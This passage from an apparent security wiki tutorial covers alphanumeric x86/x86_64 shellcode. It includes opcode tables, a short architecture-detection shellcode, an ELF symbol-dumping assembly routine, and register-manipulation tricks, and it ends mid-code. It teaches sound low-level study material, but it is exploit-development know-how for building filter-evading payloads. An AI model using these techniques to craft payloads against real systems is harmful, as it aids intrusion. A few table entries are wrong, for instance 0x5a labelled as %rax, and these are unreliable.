|Bad Instruction!<br />
|-<br />
! scope="row" | c <br />
| 0x63<br />
|movslq (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | d<br />
| 0x64<br />
|%fs segment register<br />
|-<br />
! scope="row" | e<br />
| 0x65<br />
| %gs segment register<br />
|-<br />
! scope="row" | f<br />
| 0x66<br />
| 16 bit operand override<br />
|-<br />
! scope="row" | g<br />
| 0x67<br />
| 16 bit ptr override<br />
|-<br />
! scope="row" | h<br />
| 0x68<br />
|push [dword]<br />
|-<br />
! scope="row" | i<br />
| 0x69<br />
|imul [dword], (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | j<br />
| 0x6a<br />
|push [byte]<br />
|-<br />
! scope="row" | k<br />
| 0x6b<br />
|imul [byte], (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | l<br />
| 0x6c<br />
|insb (%dx),%es:(%rdi)<br />
|-<br />
! scope="row" | m<br />
| 0x6d<br />
|insl (%dx),%es:(%rdi)<br />
|-<br />
! scope="row" | n<br />
| 0x6e<br />
|outsb %ds:(%rsi),(%dx)<br />
|-<br />
! scope="row" | o<br />
| 0x6f<br />
|outsl %ds:(%rsi),(%dx)<br />
|-<br />
! scope="row" | p<br />
| 0x70<br />
| jo [byte]<br />
|-<br />
! scope="row" | q<br />
| 0x71<br />
| jno [byte]<br />
|-<br />
! scope="row" | r<br />
| 0x72<br />
| jb [byte]<br />
|-<br />
! scope="row" | s<br />
| 0x73<br />
| jae [byte]<br />
|-<br />
! scope="row" | t<br />
| 0x74<br />
| je [byte]<br />
|-<br />
! scope="row" | u<br />
| 0x75<br />
| jne [byte]<br />
|-<br />
! scope="row" | v<br />
| 0x76<br />
| jbe [byte]<br />
|-<br />
! scope="row" | w<br />
| 0x77<br />
| ja [byte]<br />
|-<br />
! scope="row" | x<br />
| 0x78<br />
| js [byte]<br />
|-<br />
! scope="row" | y<br />
| 0x79<br />
| jns [byte]<br />
|-<br />
! scope="row" | z<br />
| 0x7a<br />
| jp [byte]<br />
|-<br />
|}<br />
<br />
= Alphanumeric opcode compatibility =<br />
Intercompatible opcodes are important to note due to the fact that many opcodes overlap and thus, writing [[shellcode]] that will run on both 32 bit and 64 bit x86 platforms becomes possible. <br />
<br />
== Alphanumeric inter-compatible x86 opcodes ==<br />
This chart was derived by cross referencing [[#Available_Instructions|available 64 bit instructions]] with [[Ascii_shellcode#Available_Instructions|available 32 bit instructions]].<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|+ Intercompatible x86* Alphanumeric Opcodes<br />
|-<br />
! scope="col" | Hex<br />
! scope="col" | ASCII<br />
! scope="col" | Assembler Instruction<br />
|-<br />
! scope="row" | 0x64, 0x65<br />
| d,e<br />
|[fs &#x7c; gs] prefix<br />
|-<br />
! scope="row" | 0x66, 0x67<br />
| f,g<br />
| 16bit [operand &#x7c; ptr] override<br />
|-<br />
! scope="row" | 0x68, 0x6a<br />
| h,j<br />
| push<br />
|-<br />
! scope="row" | 0x69, 0x6b<br />
| i,k<br />
| imul<br />
|-<br />
! scope="row" | 0x6c-0x6f<br />
| l-o<br />
| ins[bwd], outs[bwd]<br />
|-<br />
! scope="row" | 0x70-0x7a<br />
| p-z<br />
| Conditional Jumps<br />
|-<br />
! scope="row" | 0x30-0x35<br />
| 0-5<br />
| xor<br />
|-<br />
! scope="row" | 0x36<br />
| 6<br />
| %ss segment register<br />
|-<br />
! scope="row" | 0x38-0x39<br />
| 8,9<br />
| cmp<br />
|-<br />
! scope="row" | 0x50-0x57<br />
| P-W<br />
| push *x, *i, *p<br />
|-<br />
! scope="row" | 0x58-0x5a<br />
| XYZ<br />
| pop [*ax, *cx, *dx]<br />
|-<br />
|}<br />
<br />
Because not ''all'' opcodes are intercompatible, yet comparisons and conditional jumps ''are'' intercompatible, it is possible to determine the architecture of an x86 processor using exclusively alphanumeric opcodes. The opcodes which are specifically not compatible are limited to the 64 bit special prefixes '''0x40-0x4f''', which allow for manipulation of 64 bit registers and 8 additional 64 bit general purpose registers, '''%r8-%r15'''. By making use of these additional registers (which 32 bit processors do not have), one can perform an operation that will set a value on a different register in the two processors. Following this, a conditional statement can be made against one of the two registers to determine if the value was set. Using the '''pop''' instruction is the most effective way to set the value of a register due to instructional limitations. Using an alternative register to %rsp or %esp as the stack pointer enables the use of an effective conditional statement to determine if the value of a register is equal to the most recent thing pushed or popped from the stack.<br />
<br />
==15 byte architecture detection shellcode==<br />
{{info|This bytecode does not have a conditional jump. The reader may add this for customization based on the size and architecture of the payload that occurs after this snippet.}}<br />
This simple alphanumeric bytecode is 15 bytes long, ending in a comparison which returns '''equal''' on a 32 bit system and '''not equal''' on a 64 bit system. The conditional jump may be best reserved for the '''t''' and '''u''' instructions, '''jump if equal''' and '''jump if not equal''', respectively.<br />
<br />
* Assembled:<br />
'''TX4HPZTAZAYVH92'''<br />
<br />
* Disassembly:<br />
[root@ares bha]# objdump -d xarch32.o<br />
<br />
xarch32.o: file format elf32-i386<br />
<br />
Disassembly of section .text:<br />
00000000 <_start>:<br />
0: 54 push %esp<br />
1: 58 pop %eax<br />
2: 34 48 xor $0x48,%al<br />
4: 50 push %eax<br />
5: 5a pop %edx<br />
6: 54 push %esp<br />
7: 41 inc %ecx<br />
8: 5a pop %edx<br />
9: 41 inc %ecx<br />
a: 59 pop %ecx<br />
b: 56 push %esi<br />
c: 48 dec %eax<br />
d: 39 32 cmp %esi,(%edx)<br />
[root@ares bha]# # Returns not-equal on a 64 bit system:<br />
[root@ares bha]# objdump -d xarch64.o<br />
<br />
xarch64.o: file format elf64-x86-64<br />
<br />
<br />
Disassembly of section .text:<br />
<br />
0000000000000000 <_start>:<br />
0: 54 push %rsp<br />
1: 58 pop %rax<br />
2: 34 48 xor $0x48,%al<br />
4: 50 push %rax<br />
5: 5a pop %rdx<br />
6: 54 push %rsp<br />
7: 41 5a pop %r10<br />
9: 41 59 pop %r9<br />
b: 56 push %rsi<br />
c: 48 39 32 cmp %rsi,(%rdx)<br />
<br />
On a 64-bit system, this will not cause a segfault because (%rdx) points to somewhere inside the stack. Also notice that while this was assembled as a [[Linux]]-based ELF executable, the [[Operating System]] should not matter, as this stays within the confines of legal instructions for any x86 CPU that should not cause an access violation.<br />
<br />
<br />
* '''Diagram of a 64-bit ELF Header:'''<br />
0x0 - 0xf = "ELF Format Information"<br />
Entry-point = 0x18 - 0x1f<br />
Start of section headers = 0x28 - 0x2f<br />
Size of each section = 0x3a - 0x3b<br />
Number of section headers = 0x3c - 0x3d<br />
<br />
<br />
* '''Diagram of a 64-bit section header:''' ''(length defined in ELF header)''<br />
[0x0-0x3] shstrtab offset for section name.<br />
shstrtab is defined between the end of<br />
.text and the beginning of the section<br />
headers<br />
<br />
[0x4-0x7] section type - 0 is null, 1 is progbits, 2 is symtab, 3 is strtab<br />
[0x8-0xf] section flags<br />
[0x10-0x17] section address<br />
[0x18-0x1f] section offset<br />
[0x20-0x27] section size<br />
[0x28-0x2b] Section Link<br />
[0x2c-0x2f] Section Info<br />
[0x30-0x37] Section Align<br />
[0x38-0x3f] Section EntSize<br />
<br />
* '''Diagram of a 64-bit symbol table entry:''' ''(0x18 bytes in length)''<br />
<br />
[0x0-0x3] Name offset from next string table<br />
[0x4-0x5] Bind<br />
[0x6-0x7] Ndx<br />
[0x8-0xf] Symbol pointer (Function pointer, data pointer, etc)<br />
[0x10-0x17] Null barrier<br />
<br />
It is relatively trivial to find your imagebase at runtime using some small assembly, but more difficult to actually parse out the ELF image. Here's an unstable (no error or size checking) assembly code that will dump its own symbols:<br />
<br />
{{code|text=<source lang="asm"><br />
.section .data<br />
.section .text<br />
<br />
.globl _start<br />
<br />
_start:<br />
jmp startup<br />
<br />
strlen:<br />
xor %rdx, %rdx<br />
<br />
next_byte:<br />
inc %rdx<br />
cmpb $0x00, (%rsi,%rdx,1);<br />
jne next_byte<br />
ret<br />
<br />
getpc: <br />
mov (%rsp), %rax<br />
ret<br />
<br />
startup:<br />
xor %r15, %r15<br />
push $0x0a0a0a<br />
mov %rsp, %r15<br />
call getpc<br />
dec %rax<br />
xor %rcx, %rcx<br />
push $0x2<br />
pop %rsi<br />
<br />
find_header:<br />
cmpl $0x464c457f, (%rax,%rcx,4) # Did we find our ELF base pointer?<br />
je find_sections<br />
dec %rax<br />
jmp find_header<br />
<br />
find_sections:<br />
# %rax now = base pointer of ELF image.<br />
xor %rbx, %rbx<br />
add $0x28, %bl<br />
xorl (%rax,%rbx,1), %ecx # %rcx = offset to section headers<br />
addq %rax, %rcx # %rcx = absolute address to section headers<br />
<br />
# each section header is 0x40 bytes in length.<br />
next_section:<br />
xor %rbx, %rbx<br />
xor %rbp, %rbp<br />
add $0x40, %rcx<br />
# %rcx now = address to first entry<br />
add $0x04, %bl<br />
xor (%rcx,%rbx,1), %ebp # %rbp now contains type<br />
cmp $0x02, %bpl<br />
jne next_section<br />
<br />
found_symbols:<br />
xor %r8, %r8<br />
mov %rcx, %r8 # %rcx = pointer to top of symbol section header<br />
add $0x40, %r8 # %r8 = pointer to top of string table section header<br />
<br />
xor %rbx, %rbx<br />
xor $0x18, %bl # pointer to actual section is $0x18 bytes from header base<br />
<br />
xor %r9, %r9<br />
xor %r10, %r10<br />
xor (%rcx,%rbx,1), %r9<br />
xor (%r8,%rbx,1), %r10<br />
addq %rax, %r9 # r9 should now point to the first symbol<br />
addq %rax, %r10 # r10 should now point to the first string<br />
addq $0x18, %r9<br />
<br />
next_symbol:<br />
addq $0x18,%r9<br />
xor %rcx, %rcx<br />
xor %rbp, %rbp<br />
xor %rdi, %rdi<br />
xor (%r9,%rcx,1), %ebp # %rbp now contains string offset.<br />
cmp %rbp, %rdi<br />
je next_symbol<br />
<br />
print_symbol_name:<br />
mov %rbp, %rsi<br />
addq %r10, %rsi # %rsi should now be a pointer to a string<br />
push $0x01<br />
pop %rax<br />
push %rax<br />
pop %rdi<br />
call strlen<br />
syscall<br />
<br />
push $0x01<br />
pop %rax<br />
push %rax<br />
pop %rdi<br />
push $0x02<br />
pop %rdx<br />
push %r15<br />
pop %rsi<br />
syscall<br />
jmp next_symbol<br />
</source>}}<br />
<br />
[hatter@bha soinject]$ ./test_parser <br />
startup<br />
<br />
getpc<br />
<br />
find_header<br />
<br />
find_sections<br />
<br />
next_section<br />
<br />
found_symbols<br />
<br />
next_symbol<br />
<br />
print_symbol_name<br />
<br />
strlen<br />
<br />
next_byte<br />
<br />
_start<br />
<br />
__bss_start<br />
<br />
_edata<br />
<br />
_end<br />
<br />
'''Segmentation fault'''<br />
<br />
{{programming}}{{exploitation}}{{social}}<br />
<br /><br />
<br />
=Alphanumeric x86_64 register value and data manipulation=<br />
<br />
Given the limited set of instructions for alphanumeric shellcode, its important to note different methods to manipulate different registers within the confines of the limited instruction set. Identifying these leads to '''mov emulations''', which make up most of the actual code.<br />
<br />
==Push: alphanumeric x86_64 registers==<br />
<br />
Alphanumeric data can be pushed in one-byte, two-byte, and four-byte quantities at once.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''One-byte, two-byte, and four-byte quantities'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pushw [word]<br />
| \x66\x68\x##\x##<br />
| fh??<br />
|-<br />
| pushq [byte]<br />
| \x6a\x##<br />
| j?<br />
|-<br />
| pushq [dword]<br />
| \x68\x##\x##\x##\x##<br />
| h????<br />
|}<br />
<br />
<br />
Pushing the 64 bit registers RAX-RDI is done using a single upper case P-W (\x50-\x57) dependent on which register is being pushed. Prefixing with "A" (for general registers R8-R15) or "f" for 16 bit registers (AX-DI) gives access to push 32 registers using alphanumeric shellcode.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 Extended Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %rax <br />
| \x50<br />
| P<br />
|-<br />
| push %rcx<br />
| \x51<br />
| Q<br />
|-<br />
| push %rdx<br />
| \x52<br />
| R<br />
|-<br />
| push %rbx<br />
| \x53<br />
| S<br />
|-<br />
| push %rsp <br />
| \x54<br />
| T<br />
|-<br />
| push %rbp<br />
| \x55<br />
| U<br />
|-<br />
| push %rsi<br />
| \x56<br />
| V<br />
|-<br />
| push %rdi<br />
| \x57<br />
| W<br />
|}<br />
<br />
<br />
For the general registers R8-R15 "A" is prefixed to the corresponding RAX-RDI register push. <br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 General Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %r8<br />
| \x41\x50<br />
| AP<br />
|-<br />
| push %r9<br />
| \x41\x51<br />
| AQ<br />
|-<br />
| push %r10<br />
| \x41\x52<br />
| AR<br />
|-<br />
| push %r11<br />
| \x41\x53<br />
| AS<br />
|-<br />
| push %r12<br />
| \x41\x54<br />
| AT<br />
|-<br />
| push %r13<br />
| \x41\x55<br />
| AU<br />
|-<br />
| push %r14<br />
| \x41\x56<br />
| AV<br />
|-<br />
| push %r15<br />
| \x41\x57<br />
| AW<br />
|}<br />
<br />
<br />
For the 16 bit registers AX-DI "f" is prefixed to the corresponding RAX-RDI register push.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 16 bit Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %ax<br />
| \x66\x50<br />
| fP<br />
|-<br />
| push %cx<br />
| \x66\x51<br />
| fQ<br />
|-<br />
| push %dx<br />
| \x66\x52<br />
| fR<br />
|-<br />
| push %bx<br />
| \x66\x53<br />
| fS<br />
|-<br />
| push %sp<br />
| \x66\x54<br />
| fT<br />
|-<br />
| push %bp<br />
| \x66\x55<br />
| fU<br />
|-<br />
| push %si<br />
| \x66\x56<br />
| fV<br />
|-<br />
| push %di<br />
| \x66\x57<br />
| fW<br />
|}<br />
<br />
<br />
For the 16 bit general registers R8B-R15b "f" is prefixed to the corresponding R8-R15 register push.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 16 bit General Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %r8w<br />
| \x66\x41\x50<br />
| fAP<br />
|-<br />
| push %r9w<br />
| \x66\x41\x51<br />
| fAQ<br />
|-<br />
| push %r10w<br />
| \x66\x41\x52<br />
| fAR<br />
|-<br />
| push %r11w<br />
| \x66\x41\x53<br />
| fAS<br />
|-<br />
| push %r12w<br />
| \x66\x41\x54<br />
| fAT<br />
|-<br />
| push %r13w<br />
| \x66\x41\x55<br />
| fAU<br />
|-<br />
| push %r14w<br />
| \x66\x41\x56<br />
| fAV<br />
|-<br />
| push %r15w<br />
| \x66\x41\x57<br />
| fAW<br />
|}<br />
<br />
==Pop: alphanumeric x86_64 registers==<br />
<br />
Pop is more limited in its range of usable registers due to the limitations of alphanumeric shellcode. This is limited to RAX, RCX, and RAX. As with push, the extended register shellcode is prefixed to access 16 bit and general registers. This gives the ability to pop a total of 12 (6 full size and 6 16 bit) registers able to be pop(ed). <br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Pop: X86_64 Extended Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pop %rax <br />
| \x58<br />
| X<br />
|-<br />
| pop %rcx<br />
| \x59<br />
| Y<br />
|-<br />
| pop %rax<br />
| \x5a<br />
| Z<br />
|}<br />
<br />
<br />
For general registers, RAX-RCX are prefixed with "A" for the corresponding R8-R10 pop. <br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Pop: X86_64 General Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pop %r8 <br />
| \x41\x58<br />
| AX<br />
|-<br />
| pop %r9<br />
| \x41\x59<br />
| AY<br />
|-<br />
| pop %r10<br />
| \x41\x5a<br />
| AZ<br />
|}<br />
<br />
<br />
16 bit registers (using 0x66 or 'f' [sometimes fA] prefix):<br />
<br />
{| border="1" cellpadding="5" cellspacing="0" align="center"<br />
! Assembly<br />
! Hexadecimal<br />
! Alphanumeric ASCII <br />
|-<br />
| pop %ax<br />
| \x66\x58<br />
| fX<br />
|-<br />
| pop %cx<br />
| \x66\x59<br />
| fY<br />
|-<br />
| pop %dx<br />
| \x66\x5a<br />
| fZ<br />
|-<br />
| pop *%r8w<br />
| \x66\x41\x58<br />
| fAX<br />
|-<br />
| pop *%r9w<br />
| \x66\x41\x59<br />
| fAY<br />
|-<br />
| pop *%r10w<br />
| \x66\x41\x5a<br />
| fAZ<br />
|}<br />
<br />
Using push and pop the values of 6 fullsize CPU registers can be set:<br />
<br />
*%rax<br />
*%rcx<br />
*%rdx<br />
*%r8<br />
*%r9<br />
*%r8<br />
<br />
Or get any values of 16 fullsize CPU registers to the top of the stack:<br />
<br />
*%r8-%r15<br />
*%rax-%rdi<br />
<br />
== Prefixes ==<br />
<br />
Examining this next section, there are 5 main registers, and 5 special 64 bit registers that can be push(ed), but not pop(ed):<br />
<br />
*%rbx<br />
*%rsp<br />
*%rbp<br />
*%rsi<br />
*%rdi<br />
<br />
This can be written using alphanumeric bytecode instructions and operands only through the use of any of the 6 full control registers by emulating for mov with push and pop. Using only the registers already accessed, an attempt will be made to get instructions for to set values.<br />
<br />
The special register prefix has been identified:<br />
<br />
0x41, 'A'<br />
<br />
The word operand override has been identified, <br />
<br />
0x66, 'f'.<br />
<br />
Note the identification of all the alphanumeric overrides and prefixes. These overrides are very similar to those for 32 bit platforms.<br />
<br />
{| class="wikitable"<br />
! Hex Value<br />
! Alpha Value<br />
! Description<br />
|-<br />
| 0x36<br />
| 6<br />
| %ss segment override<br />
|-<br />
| 0x64<br />
| d<br />
| %fs segment override<br />
|-<br />
| 0x65<br />
| e<br />
| %gs segment override<br />
|-<br />
| 0x66<br />
| f<br />
| 16-bit operand size<br />
|-<br />
| 0x67<br />
| g<br />
| 16-bit address size<br />
|-<br />
| 0x41<br />
| A<br />
| 64-bit special register use (%r##)<br />
|-<br />
| 0x48<br />
| H<br />
| 64-bit register size override<br />
|-<br />
| 0x40-4f<br />
| B-P<br />
| Special 64-bit overrides<br />
|}<br />
<br />
== Operands ==<br />
<br />
Opcodes used for popping a register can also be used as 'register operands' for more advanced instructions. For example, take this xor instruction:<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor $0x[byte](%rax),%ebx</syntaxhighlight><br />
| \x33\x58\x##<br />
| 3X?<br />
|}<br />
<br />
The %rax register can be changed to %rcx or %rdx using the 0x59 (Y) and 0x5a (Z) opcodes in place of the 0x58 (X) opcode:<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor $0x[byte](%rcx),%ebx</syntaxhighlight><br />
| \x33\x59\x##<br />
| 3Y?<br />
|}<br />
<br />
Whenever there's a controllable register, the notation {reg} is used to recognize it as an option. In the bytecodes and string examples, a '?' is used in the bytecode itself and a '*' to denote the register operand, for example:<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
|<syntaxhighlight lang="asm">xor $0x[byte]({reg}),%ebx</syntaxhighlight><br />
| \x33\x??\x##<br />
| 3*?<br />
|}<br />
<br />
The opcodes for '''%rax''', '''%rcx''', and '''%rdx''' are important and thus will be used frequently. When encountering multiple operands, the operand number is used in the notation for readability purposes.<br />
<br />
== The rbx, rsp, and rbp registers ==<br />
Identifying the ways to set the rest of the registers while investigating %rbx was not entirely fruitful. Full control over the %rbx register is not available, however, write access to its sub-registers is available:<br />
* %ebx<br />
* %bx<br />
* %bh<br />
* %bl<br />
<br />
Apon further investigation, this opened up access to multiple additional registers using:<br />
*Xor<br />
*Imul<br />
*Movslq<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor $0x[byte]({reg64}),{reg32}</syntaxhighlight><br />
| \x33\x??\x#1<br />
| 3*1<br />
|-<br />
| <source lang="asm">imul $0x[dword1],0x[byte2]({reg64}),{reg32}</source><br />
| \x69\x??\x#2\x#1\x#1\x#1\x#1<br />
| i*21111<br />
|-<br />
| <source lang="asm">imul $0x[byte1],0x[byte2]({reg64}), {reg32}</source><br />
| \x6b\x??\x#2\x#1<br />
| k*21<br />
|-<br />
| <source lang="asm">movslq 0x[byte1]({reg64}), {reg32}</source><br />
| \x63\x??\x#1<br />
| c*1<br />
|}<br />
<br />
To access the %ss segment, insert the prefix at the beginning of the bytecode of instructions (e.g. "63*?" instead of "3*?"). If preferred to use the special 64 bit registers, <br />
0x41 or "A" is placed at the beginning of the bytecode. If the use of both is required, the %ss segment register prefix first, e.g. '6A3*?' must always be used. When using one of the 64 bit force operators, one can use any of those instructions on a 32 bit register with an override to treat it as its 64-bit counterpart (in this case, 0x48).<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <source lang="asm">imul $0x[byte1],0x[byte2]({reg64}),{reg64}</source><br />
| \x48\x6b\x??\x#2\x#1<br />
| Hk*21<br />
|}<br />
<br />
To set the value of %rbx directly, imul, xor, and movslq can be used. It's similar for other registers:<br />
* %rbp<br />
* %rsp<br />
<br />
==Xor==<br />
Left over are %rsp, %rbp, %rdi, and %rsi. Taking a closer look at xor, at 0x30 and ending at 0x35 are these valuable xor commands:<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x34<br />
| <syntaxhighlight lang="asm">xor $0x##, %al</syntaxhighlight><br />
|-<br />
| 0x35<br />
| <syntaxhighlight lang="asm">xor $0x########, %eax</syntaxhighlight><br />
|-<br />
| 0x48 0x35<br />
| <syntaxhighlight lang="asm">xor $0x########, %rax</syntaxhighlight><br />
|}<br />
<br />
'''0x30''' is a multi-byte xor instruction. Requiring at least two operands (even if register denote):<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x30<br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit},%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit},%{64bit},2)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](,%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](,%{64bit},2)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](,%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](,%{64bit},2)</syntaxhighlight><br />
|}<br />
<br />
'''0x31''' is as flexible as '''0x30'''. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x31<br />
| <syntaxhighlight lang="asm">xor %{32bit}, (%{64bit})</syntaxhighlight><br />
|}<br />
<br />
'''0x32''' is just as flexible, although the offsets will change source side rather than destination side. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x32<br />
| <syntaxhighlight lang="asm">xor (%{64bit}), %{16bit}</syntaxhighlight><br />
|}<br />
<br />
'''0x33''' is the opposite of 0x31 and as flexible. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x33<br />
| <syntaxhighlight lang="asm">xor (%{64bit}), %{32bit}</syntaxhighlight><br />
|}<br />
<br />
== The rsi and rdi registers ==<br />
<br />
Combining the knowledge of xor with the knowledge of the stack. When any data is pushed, the data is accessible at %ss:(%rsp). Knowing this, another register can be used in the available space (e.g. %rcx) to set values on some of the more difficult registers:<br />
<br />
*%rbx<br />
*%rsp<br />
*%rbp<br />
*%rsi<br />
*%rdi<br />
<br />
First, utilise push and pop to simulate 'mov':<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsp; \x54<br />
pop %rcx; \x59<br />
pop %rax; \x5a (This just sets the pointer back)<br />
</syntaxhighlight>}}<br />
<br />
Two XOR parameters allow index registers to be set, %rsi and %rdi. For now, they will be zero'd out:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsi; \x56<br />
xor %ss:(%rcx), %rsi; \x36\x48\x33\x31<br />
pop %r8; \x41\x58 <br />
push %rdi; \x57<br />
xor %ss:(%rcx), %rdi; \x36\x48\x33\x39<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Now %rsi and %rdi have been zero'd out. %r14 and %r15 special registers can also be pushed and zeroed out in this fashion. Now "full control" is gained over:<br />
<br />
*%rax<br />
*%rcx<br />
*%rdx<br />
*%rsi<br />
*%rdi<br />
*%r8<br />
*%r9<br />
*%r10<br />
*%r14<br />
*%r15<br />
<br />
So far, in this sample, full control has not been utilized over:<br />
<br />
*%rsp<br />
*%rbp<br />
*%rbx<br />
*%r11<br />
*%r12<br />
*%r13<br />
<br />
Similar to push, controllable data is required before the setting of a register. Where pop is concerned, something might be required to be pushed to the stack first, in this case, only the zero register is required. Due to the way that XOR works, once a zero is registered at all, in this case %rax is used as the zero register, it can be used to get %rbx, %rsp, and %rbp to zero if needed:<br />
<br />
To get %rbx:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %ss:0x30(%rcx), %rax; store that value in rax<br />
xor %rax, %ss:0x30(%rcx); Null that area of stack<br />
imul $0x30,%ss:0x30(%rax),%rbx; 0x30 * 0 = 0 <br />
imul $0x30,%ss:0x30(%rax),%rbp; 0x30 * 0 = 0<br />
</syntaxhighlight>}}<br />
<br />
Once the stack space, as well as the destination is set to zero, %rax, %rbp can effectively be mov(ed):<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rax,%ss:0x30(%rcx); 36 48 31 41 30<br />
xor %ss:0x30(%rcx),%rbp; 36 48 33 69 30<br />
</syntaxhighlight>}}<br />
<br />
The closest thing to incrementing and decrementing is the ability to use the ins and outs instructions to add or subtract 1,2, or 4 against the %rdi register. This still leaves no significant add or sub. Imul can be used with 16 and 8 bit registers to find division. If %rsi or %rdi are not in use, there is also a magic mov :<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
movslq %ss:0x30(%rcx), %rsi<br />
xor %rsi, %ss:0x30(%rsi)<br />
</syntaxhighlight>}}<br />
<br />
This can come in quite handy when chunking large pieces of data to 0.<br />
<br />
==Example: Zeroing Out x86_64 CPU Registers==<br />
<br />
First %rsp is pushed to the top of the stack and the pointer address is popped into in %rcx, the third pop is to ensure that the pointer address matches what is now in %rcx.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsp<br />
pop %rcx<br />
pop %r8 <br />
</syntaxhighlight>}}<br />
<br />
The following push overwrites %ss:(%rcx) with the contents of %rsi, the xor zeros out %rsi by xoring itself, and %rsp is then set back to %rcx using pop. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsi<br />
xor %ss:(%rcx), %rsi<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Again using the same form, %ss:(%rcx) is overwritten, %rdi is zeroed out using xor, and %rsp is reset to %rcx. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdi<br />
xor %ss:(%rcx), %rdi<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Zeroing out RDX is much simpler.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdi<br />
pop %rdx<br />
</syntaxhighlight>}}<br />
<br />
The following push and pop sets %rax to 0x30. %al is the lowest order 8 bit subregister of %rax. Since 0x30 resides in %al, the xor effectively zeroes out $rax.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push $0x30<br />
pop %rax<br />
xor $0x30, %al<br />
</syntaxhighlight>}}<br />
<br />
For %rbx and %rbp we xor %ss:0x30(%rcx), which is first zeroed out, against each register and then xor the register against %ss:0x30(%rcx), which results in each register being zeroed out.<br />
<br />
Zero out the %ss:0x30(%rcx) stack segment.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %ss:0x30(%rcx), %rax<br />
xor %rax, %ss:0x30(%rcx)<br />
</syntaxhighlight>}}<br />
<br />
xor %rbx into the stack segment and then xor it against rbx to zero. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rbx, %ss:0x30(%rcx)<br />
xor %ss:0x30(%rcx), %rbx<br />
</syntaxhighlight>}}<br />
<br />
Rezero the stack segment with %rax. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
